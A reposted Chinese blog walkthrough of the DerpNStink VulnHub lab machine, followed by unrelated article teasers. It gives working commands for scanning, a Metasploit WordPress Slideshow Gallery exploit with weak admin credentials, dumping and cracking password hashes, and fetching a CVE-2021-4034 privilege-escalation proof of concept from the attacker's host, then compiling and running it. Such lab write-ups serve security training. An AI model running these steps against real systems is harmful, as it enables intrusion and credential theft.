DERPNSTINK: 1-打靶渗透【附代码】(权限提升)

news2024/9/22 9:46:10

DerpNStink

靶机下载地址:

https://www.vulnhub.com/entry/derpnstink-1,221/#downloadicon-default.png?t=N7T8https://www.vulnhub.com/entry/derpnstink-1,221/#download

1. 主机发现+端口扫描+目录扫描+操作系统等信息收集

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:50:53:00'

1.2. 端口扫描

nmap -p- 192.168.7.10

1.3. 目录扫描

dirb http://192.168.7.10

1.4. 操作系统等信息收集

whatweb 192.168.7.10

2. WEB打点寻找漏洞点

2.1. 进入80端口

1.老规矩,看看网页有啥功能点 -> 无 -> 右键检查页面第一个flag【不好找直接搜flag】

2.网页都是图片,看不了网页源代码,一个解决思路,利用kali直接下载网站源代码看看 -> 顺便看看还有什么可以用的

curl http://192.168.7.10
# flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

在源代码里面发现了一个.txt的路径,疑似信息泄露

/webnotes/info.txt

利用curl工具去访问该路径->翻译看看

curl http://192.168.7.10/\webnotes/info.txt

我们不知道域名先搁置一下,看看扫的目录

2.2. 拼接扫出的目录

1.拼接/robots.txt -> 逐个拼接试试 -> 无用

2.拼接/php/phpmyadmin/,无账号密码信息,弱口令爆破无果->暂时pass

3.拼接/weblog/wp-admin/,无账号密码信息,弱口令爆破 ->【admin:admin

成功进入

4.拼接/weblog -> 发现跳转到一个域名之下,我们有理由怀疑这就是他的域名

我们在本机将host与ip相关联,具体流程请移步这篇文章查看详细过程

Hacknos-OS-Hax打靶渗透【附POC】-CSDN博客文章浏览阅读403次,点赞4次,收藏6次。Hacknos-OS-Hax打靶渗透【附POC】https://blog.csdn.net/weixin_52487093/article/details/140387153?spm=1001.2014.3001.5502

看文章的2.2到这步就哦了,其中ip改为靶机ip;localhost改为http://derpnstink.local,实在不行就过burp流量尝试一下

wordpress是一个常见的cms,直接用kali的wpscan跑,wpscan蛮好用的如果想具体的深入了解-接口api领取,可以移步我的另一篇文章

《wpscan》免费密钥API申请_wpscan api-CSDN博客文章浏览阅读294次,点赞8次,收藏4次。《wpscan》免费密钥API申请_wpscan apihttps://blog.csdn.net/weixin_52487093/article/details/140379774?spm=1001.2014.3001.5502

5.回到那个wordpress页面

把kali的hosts也改了

cat /etc/hosts
vim /etc/hosts
wpscan --url http://derpnstink.local/weblog

使用Slideshow Gallery 存在的漏洞

因为我们知道后台的账户密码,所以我们用msf来进行getshell操作

2.3. GetShell

1.开启msf环境

msfconsole

search slideshow
use 1
show options
set rhosts 192.168.7.10 #靶机
set targeturi /weblog/	#靶机路径
set wp_user admin
set wp_password admin
run

2.利用python将shell转变为交互式的shell

shell
python -c 'import pty; pty.spawn("/bin/bash")'

3.老规矩,拼接常规默认路径逐个看文件,发现了数据库的账号和密码【root:mysql

cd /var/www/html/weblog
ls
cat wp-config.php

4.登陆数据库

进入后台 -> 访问 wp_posts 表发现 flag2.txt

5.翻看其他表,wp_users有两个账号密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

6.新建一个文件保存账号密码

vim user_pass.txt
cat user_pass.txt

导出hash库,爆破

cd /usr/share/wordlists
gunzip rockyou.txt.gz
cp rockyou.txt /home/kali/Desktop
cd /home/kali/Desktop
john --wordlist=/home/kali/Desktop/rockyou.txt user_pass.txt 

unclestinky:wedgie57
admin:admin

7.在靶机home目录下发现两个用户,mrderp/stinky

8.【以下是拔旗flag,与后续shell无关,专注完成提权目标的可忽略,直接看提权】

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

su stinky
ls -al
cd ~/Desktop

# 在Desktop目录发现了flag3

3. 权限提升

1.查看版本信息,Ubuntu版本是14.04

尝试找漏洞

searchsploit Ubuntu
searchsploit -m 'linux/local/41762.txt'

2.查看文档 ,很难利用

找了一个有关版本的相关提权文件,有一个本地提权漏洞CVE-2021-4034, 作用有点类似于sudo,允许用户以另一个用户身份执行命令

https://github.com/arthepsy/CVE-2021-4034
将这个文件下载下来,复制到kali里面,并挂到服务上面
在反弹的交互式shell中,必须要进入tmp目录,否则无法下载
从kali的web端wget下来cve-2021-4034-poc.c,将其gcc编译输出。然后复权运行,即可提权成功。
#下载命令
wget http://192.168.7.36:8001/cve-2021-4034-poc.c
 
#下载完成之后,权限修改
chmod +x cve-2021-4034-poc.c
 
#编译脚本
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt

运行脚本->提权成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1990283.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Rabbit高级特性 - 消息重试机制(两种实现)

文章目录 消息重试机制概述实现方式一:基于消息手动确认机制,返回 nack 实现配置文件交换机、队列、绑定生产者接口消费者演示和结论 实现方式二:基于重试配置实现配置文件交换机、队列、绑定生产者接口消费者演示和结论 消息重试机制 概述 …

对深度学习神经网络做了小改进,效果提升明显,可以发论文吗?

小改了深度学习神经网络某一层,效果提升显著,可以发顶会吗? 结论就是,当然可以发,只是能不能发出高质量论文,中稿顶会,还得看你这个小改进的具体情况还有你讲故事的能力。 先说改进的具体情况…

国家统计局中国主要城市面板数据(1990-2023年)

数据说明:数据来源于国家统计局,指标包含:城市、年份、第三产业增加值、第一产业增加值 地区生产总值、第二产业增加值、年末户籍人口、城镇非私营单位在岗职工平均工资 房地产开发投资额、房地产开发住宅投资额、房地产开发办公楼投资额、房…

什么是股指期权与股指期货的套利策略?

沪深300股指期权和沪深300股指期货就像是孪生兄弟,它们不仅到期时间一样,结算价格也一样,而且都是现金结算。这意味着,如果你用期权的方式“造”出一个期货来,跟市场上真实交易的期货,在到期那天&#xff0…

Eclipse 首选项(Preferences)

设置首选项 该对话框可通过框架管理但是其他插件可以设置其他页面来管理首选项的配置。 我们可以通过 Window 菜单选择 Preferences 菜单项来开启该对话框。 首选项页面有多个分类组成。你可以在左侧菜单中展开各个节点来查看首选项的配置。 左上角的输入框可以快速查找首选…

#子传父父传子props和emits #封装的table #vue3

#子传父&父传子props和emits #封装的table #vue3 父组件&#xff1a;emits defineEmits props 子组件&#xff1a; 子组件 <template><el-table v-bind"$attrs" ref"innerTableRef" v-loading"loading" border :data"tabl…

鸿蒙HarmonyOS开发:如何灵活运用动画效果提升用户体验

文章目录 一、动画概述1、动画的目的 二、显式动画 (animateTo)1、接口2、参数3、AnimateParam对象说明4、示例5、效果 三、属性动画 (animation)1、接口2、参数3、AnimateParam对象说明4、系统可动画属性4、示例5、效果 一、动画概述 动画的原理是在一个时间段内&#xff0c;…

QT使用ui文件创建窗口

目录 带ui文件 添加状态栏 资源文件的使用 添加文件资源 使用文件资源 带ui文件 编辑 添加状态栏 MainWindow::MainWindow(QWidget *parent): QMainWindow(parent), ui(new Ui::MainWindow) {ui->setupUi(this);// 添加状态栏ui->statusbar->addWidget(new QLab…

codeforces查看题解

文章目录 1. 步骤一&#xff1a;右键单击箭头指向位置&#xff0c;根据提示打开链接2. 步骤二&#xff1a;左键单击箭头指向位置3. 结果&#xff1a;红线上方是参考代码&#xff0c;下方是测试样例4. 补充&#xff1a;① 右边这个方框可以筛选想要查看代码的状态(Accepted、Wro…

AI在医学领域:残差扩散模型预测特发性肺纤维化 (IPF)

关键词&#xff1a; IPF 进展预测、残差扩散模型、临床信息 特发性肺纤维化&#xff08;Idiopathic Pulmonary Fibrosis&#xff0c;IPF&#xff09;是一种严重且不可逆的肺部疾病&#xff0c;它会导致肺部组织出现瘢痕和增厚&#xff0c;从而引起呼吸困难。。及时对IPF进行治…

Unity入门4——常用接口

C#中常用类和接口 DateTime&#xff1a;表示某个时刻 DateTime.Now&#xff1a;拿到系统当前时间DtaTime.TimeOfDay&#xff1a;获取此实例当天的时间 Quaternion&#xff1a;用来旋转&#xff0c;采用四元数&#xff0c;由w&#xff08;实部&#xff09;和x,y,z&#xff08;虚…

ChinaJoy 2024: 维塔士携自研游戏亮相,探讨数据驱动游戏开发

2024年7月30日,上海——全球领先的视频游戏开发公司维塔士精彩亮相第二十一届中国国际数码互动娱乐展览会(ChinaJoy),并首次公开自研游戏《唐传奇:琵琶行》DEMO试玩。在展会首日举办的2024中国游戏开发者大会(CGDC)上,来自维塔士西安工作室的执行制作人熊鹏昱受邀发表题为《维塔…

springboot的拦截器,监听器,过滤器,servlet的使用(三大组件)

目录 1. 拦截器1.1 简介1.2 使用 2. 监听器2.1 简介2.2 使用 3. 过滤器3.1 简介3.2 使用 4. servlet4.1 简介4.2 使用 5. 例子6. 心得 1. 拦截器 1.1 简介 Spring Boot 拦截器&#xff08;Interceptor&#xff09;是Spring MVC中用于在请求处理流程中执行某些操作的组件。它们…

Open3D 三维重建-Alpha Shapes (α-形状)

目录 一、概述 1.1原理 1.2实现步骤 二、代码实现 2.1关键函数 2.1.1函数 2.1.2参数详解 2.2完整代码 三、实现效果 3.1原始点云 3.2处理后点云 Open3D点云算法汇总及实战案例汇总的目录地址&#xff1a; Open3D点云算法与点云深度学习案例汇总&#xff08;长期更新…

08-PCB工程文件的创建

1.创建工程文件 2.创建原理图库 3.创建PCB元件库 4.创建原理图 5.创建PCB 6.改名&#xff0c;保持和项目名一致 最后save。

uniapp获取swiper中子组件的内容高度

swiper有默认高度,如果不单独设置一个具体高度&#xff0c;swiper后面的内容将不会展示 这里展示的例子是: swiper中放有一个子组件,想要完整展示子组件的内容&#xff0c;swiper就需要获取到子组件的内容高度并设置 <!-- 注意: 这里的单位是 px,不是rpx --><swiper…

【STM32】IO口取反 | 寄存器方式 | 异或运算符 | 原理

目录 STM32 IO口取反 | 寄存器方式 | 异或运算符 | 原理1. 引言2. GPIO基础知识2.1 GPIO概述2.2 STM32的GPIO架构2.3 GPIO寄存器简介 3. GPIO引脚取反原理3.1 寄存器操作实现取反3.2 异或运算符的应用 4. 示例代码4.1 基础示例&#xff1a;LED闪烁4.2 应用实例&#xff1a;继电…

大数据面试SQL(三):每分钟在线直播人数

文章目录 每分钟在线直播人数 一、题目 二、分析 三、SQL实战 四、样例数据参考 每分钟在线直播人数 一、题目 有如下数据记录直播平台主播上播及下播时间&#xff0c;根据该数据计算出平台每分钟的在线直播人数。 这里用主播名称做统计&#xff0c;前提是主播名称唯一…

【初阶数据结构题目】16.用队列实现栈

用队列实现栈 点击链接答题 思路&#xff1a; 出栈&#xff1a;找不为空的队列&#xff0c;将size-1个数据导入到另一个队列中。 入栈&#xff1a;往不为空队列里面插入数据 取栈顶元素&#xff1a; 例如&#xff1a; 两个队列&#xff1a; Q1&#xff1a;1 2 3Q2&#xff1a;…

『大模型笔记』从API到Agent:万字长文洞悉LangChain工程化设计

『大模型笔记』从API到Agent&#xff1a;万字长文洞悉LangChain工程化设计 具体内容来自&#xff1a;从API到Agent&#xff1a;万字长文洞悉LangChain工程化设计